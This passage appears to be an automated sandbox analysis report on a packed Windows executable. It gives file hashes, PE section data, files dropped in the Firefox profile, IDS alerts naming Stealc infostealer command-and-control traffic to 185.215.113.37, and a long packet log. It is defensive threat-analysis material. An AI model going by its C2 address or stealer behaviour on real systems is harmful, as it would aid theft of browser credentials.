SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.949988326231568
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'884'672 bytes
MD5:	dcd1d03f386dab945a8b534dac3d7622
SHA1:	181b3898125e89809f0a8a113ba76cca0eafe634
SHA256:	91d20ed7e7cb5e93f1a7c51ae70ff4f45bd444b9547f0dfad6dcccec6e7aa8b8
SHA512:	d42e5ae5cb69e1b26cbe56c3dada59cd03874228f82b66568a4daeddc854a68018f8fd31aa69ca2881042355f7df2d8cb10a3431501e79bc7d2fb5de40a10f4c
SSDEEP:	49152:Lpkf41ali1HU/bPs3CcE0VWPj1EFS6svxdZf4l0fnVB:Z1OGHcbkyctSgsZdZfG0fT
TLSH:	9C9533F65C000637DCDD4D75E752E34456F0E163A78E278BA0AB02B56627328AE48EDF
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xab3000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F2DFCBE97CAh
push fs
sbb al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F2DFCBEB7C5h
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax*4], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+0Ah], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x25d050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25d1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x25b000	0x22800	6db3973d4eda7dc504d822f58cfce643	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x25c000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x25d000	0x1000	0x200	c60c4959cc8d384ac402730cc6842bb0	False	0.1328125	data	0.9064079259880791	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x25e000	0x2ae000	0x200	b4e428b0e53f5bcd4d20e8e6e94a9037	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ewpmbeli	0x50c000	0x1a6000	0x1a6000	a2aaa268662c277f023b1f912eb68974	False	0.994860319164692	data	7.953891408050396	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
oepkyuxn	0x6b2000	0x1000	0x400	e98b8e1112b3051ff6547bcbb5112527	False	0.7841796875	data	6.163021908340137	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x6b3000	0x3000	0x2200	5b210b1f1e6c84b5c37d87039b40a413	False	0.06295955882352941	DOS executable (COM)	0.7587717360578627	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-01T19:32:03.216928+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T19:32:03.439267+0200	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T19:32:03.445610+0200	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.37	80	192.168.2.5	49704	TCP
2024-10-01T19:32:03.673425+0200	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T19:32:03.680581+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.37	80	192.168.2.5	49704	TCP
2024-10-01T19:32:04.801827+0200	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T19:32:05.019278+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T19:32:11.361477+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T19:32:12.596569+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T19:32:13.263028+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T19:32:13.798159+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T19:32:15.777504+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T19:32:16.275187+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 1, 2024 19:32:02.245404005 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:02.250516891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:02.250606060 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:02.250828028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:02.255959988 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:02.962095976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:02.962176085 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:02.965744019 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:02.970849037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:03.216866016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:03.216928005 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:03.218501091 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:03.223332882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:03.439205885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:03.439266920 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:03.439415932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:03.439462900 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:03.440473080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:03.445610046 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:03.673232079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:03.673247099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:03.673255920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:03.673269033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:03.673279047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:03.673289061 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:03.673299074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:03.673424959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:03.673424959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:03.675632000 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:03.680581093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:03.894610882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:03.894699097 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:03.912065029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:03.912121058 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:03.916850090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:03.917009115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:03.917021036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:03.917028904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:03.917401075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:03.917447090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:03.917555094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:04.801743984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:04.801826954 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:04.802396059 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:04.807220936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.019217014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.019231081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.019242048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.019278049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.019299030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.019462109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.019471884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.019484997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.019495010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.019527912 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.019539118 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.019979000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.019989967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.019999981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.020009995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.020025015 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.020035982 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.020070076 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.020596027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.020647049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.021015882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.021059036 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.143357038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.143450022 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.143527031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.143578053 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.143866062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.143896103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.143906116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.143912077 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.143933058 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.143959045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.144118071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.144129038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.144169092 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.144335985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.144345999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.144356012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.144370079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.144380093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.144382954 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.144406080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.144423008 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.145272017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.145282030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.145292044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.145323038 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.145345926 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.145528078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.145539045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.145579100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.146183968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.146193981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.146204948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.146230936 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.146246910 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.146532059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.146542072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.146574020 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.146584988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.147085905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.147134066 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.268373013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.268385887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.268394947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.268461943 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.268495083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.268558025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.268588066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.268599033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.268609047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.268634081 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.268657923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.268662930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.268666983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.268707037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.269126892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.269139051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.269148111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.269179106 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.269186020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.269196033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.269201994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.269202948 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.269208908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.269249916 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.270029068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.270039082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.270051003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.270085096 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.270097971 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.270158052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.270167112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.270205021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.270592928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.270603895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.270615101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.270641088 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.270654917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.270658016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.270668983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.270678997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.270690918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.270695925 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.270711899 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.270735025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.271503925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.271512985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.271522999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.271548986 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.271564960 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.271569967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.271579027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.271595001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.271605015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.271608114 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.271630049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.271761894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.272444010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.272455931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.272464991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.272500038 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.272509098 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.272512913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.272522926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.272531986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.272542953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.272553921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.272579908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.273332119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.273380995 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.273407936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.273418903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.273431063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.273438931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.273449898 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.273462057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.273487091 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.392587900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.392610073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.392617941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.392664909 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.392685890 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.393109083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.393120050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.393130064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.393160105 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.393178940 CEST	49704	80	192.168.2.5	185.215.113.37
